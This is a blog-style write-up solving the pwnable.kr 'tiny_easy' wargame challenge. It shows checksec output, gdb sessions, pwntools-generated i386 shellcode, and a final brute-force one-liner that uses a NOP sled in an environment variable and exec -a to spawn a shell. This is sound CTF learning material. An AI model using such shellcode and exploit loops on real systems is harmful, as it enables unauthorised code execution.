pwnable.kr tiny_easy writeup

0x01 Check security

1
2
3
4
5
6
7
$ checksec tiny_easy
[*] '/home/ubuntu/pwn/tiny_easy/tiny_easy'
Arch: i386-32-little
RELRO: No RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)

NX disasbled.

0x02 Disassemble

1
2
3
4
08048054 pop     eax
08048055 pop edx
08048056 mov edx, [edx]
08048058 call edx

…?
What a tiny ELF..

0x03 Debug

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
(gdb) b *0x08048056
Breakpoint 1 at 0x8048056
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/ubuntu/pwn/tiny_easy/tiny_easy

Breakpoint 2, 0x08048056 in ?? ()
(gdb) info r
eax 0x1 1
ecx 0x0 0
edx 0xffff8943 -30397
ebx 0x0 0
esp 0xffff8818 0xffff8818
ebp 0x0 0x0
esi 0x0 0
edi 0x0 0
eip 0x8048056 0x8048056
eflags 0x202 [ IF ]
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x0 0
(gdb) x/7s $edx
0xffff8943: "/home/ubuntu/pwn/tiny_easy/tiny_easy"
0xffff8968: "SHELL=/bin/bash"
0xffff8978: "WSL_DISTRO_NAME=Ubuntu-20.04"
0xffff8995: "NAME=DESKTOP-TR6SWQE"
0xffff89aa: "PWD=/home/ubuntu/pwn/tiny_easy"
0xffff89c9: "LOGNAME=ubuntu"
0xffff89d8: "_=/usr/bin/gdb"
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x6d6f682f in ?? ()

Obviously, the “tiny_easy” move ‘/hom’ to $edx, and then call edx let the program jump to address 0x6d6f682f(/hom), then tiggered a segmentation fault.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$ exec --help
exec: exec [-cl] [-a name] [command [arguments ...]] [redirection ...]
Replace the shell with the given command.

Execute COMMAND, replacing this shell with the specified program.
ARGUMENTS become the arguments to COMMAND. If COMMAND is not specified,
any redirections take effect in the current shell.

Options:
-a name pass NAME as the zeroth argument to COMMAND
-c execute COMMAND with an empty environment
-l place a dash in the zeroth argument to COMMAND

If the command cannot be executed, a non-interactive shell exits, unless
the shell option `execfail' is set.

Exit Status:
Returns success unless COMMAND is not found or a redirection error occurs.

The command exec with -a argument can help us pass the specified argv[0] to COMMAND, which mean that we can put shellcode into the environment variable, and then pass a guessed shellcode address to argv[0], then get the shell by brute force.

But the problem is, how to make a shellcode?

I guess we need pwntools…

1
2
3
4
5
6
7
$ python3
Python 3.8.10 (default, Jun 2 2021, 10:49:15)
[GCC 9.4.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> from pwn import *
>>> asm(shellcraft.i386.linux.sh())
b'jhh///sh/bin\x89\xe3h\x01\x01\x01\x01\x814$ri\x01\x011\xc9Qj\x04Y\x01\xe1Q\x89\xe11\xd2j\x0bX\xcd\x80'

And the shellcode address:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
[email protected]:~$ export A=$(python -c 'print("jhh///sh/bin\x89\xe3h\x01\x01\x01\x01\x814$ri\x01\x011\xc9Qj\x04Y\x01\xe1Q\x89\xe11\xd2j\x0bX\xcd\x80")')
[email protected]:~$ gdb ./tiny_easy
(gdb) b *0x8048058
Breakpoint 1 at 0x8048058
(gdb) r
Starting program: /home/tiny_easy/tiny_easy
Breakpoint 1, 0x08048058 in ?? ()
(gdb) info r
eax 0x1 1
ecx 0x0 0
edx 0x6d6f682f 1836017711
ebx 0x0 0
esp 0xffaaac18 0xffaaac18
ebp 0x0 0x0
esi 0x0 0
edi 0x0 0
eip 0x8048058 0x8048058
eflags 0x202 [ IF ]
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x0 0
k0 0x0 0
k1 0x0 0
k2 0x0 0
k3 0x0 0
k4 0x0 0
k5 0x0 0
k6 0x0 0
k7 0x0 0
(gdb) x/8xw 0xffaaac18
0xffaaac18: 0x00000000 0xffaabd9e 0xffaabdcd 0xffaabde3
0xffaaac28: 0xffaabdf3 0xffaabe07 0xffaabe2b 0xffaabe3f
(gdb) x/16s 0xffaabd9e
0xffaabd9e: "A=jhh///sh/bin\211\343h\001\001\001\001\201\064$ri\001\001\061\311Qj\004Y\001\341Q\211\341\061\322j\vX ̀"
0xffaabdcd: "XDG_SESSION_ID=118569"
0xffaabde3: "SHELL=/bin/bash"
0xffaabdf3: "TERM=xterm-256color"
0xffaabe07: "SSH_CLIENT=112.86.218.22 48280 2222"
0xffaabe2b: "SSH_TTY=/dev/pts/41"
0xffaabe3f: "USER=tiny_easy"
0xffaabe4e: "COLUMNS=120"
0xffaabe5a: "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin"
0xffaabec2: "MAIL=/var/mail/tiny_easy"
0xffaabedb: "_=/usr/bin/gdb"
0xffaabeea: "PWD=/home/tiny_easy"
0xffaabefe: "LANG=en_US.UTF-8"
0xffaabf0f: "LINES=30"
0xffaabf18: "HOME=/home/tiny_easy"
0xffaabf2d: "SHLVL=1"

Ok, use 0xffaabda0 as argv[0].

0x04 EXP

Befor do brute force, we should fill the shellcode by nop(\x90), to improve the success rate of call edx.

1
export A=$(python -c 'print("\x90" * 30000 + "jhh///sh/bin\x89\xe3h\x01\x01\x01\x01\x814$ri\x01\x011\xc9Qj\x04Y\x01\xe1Q\x89\xe11\xd2j\x0bX\xcd\x80")'); for i in {1..1000}; do bash -c "exec -a $(python -c 'print("\xa0\xbd\xaa\xff")') ./tiny_easy"; done
Author

lyq1996

Posted on

2021-10-10

Updated on

2021-11-07

Licensed under

Comments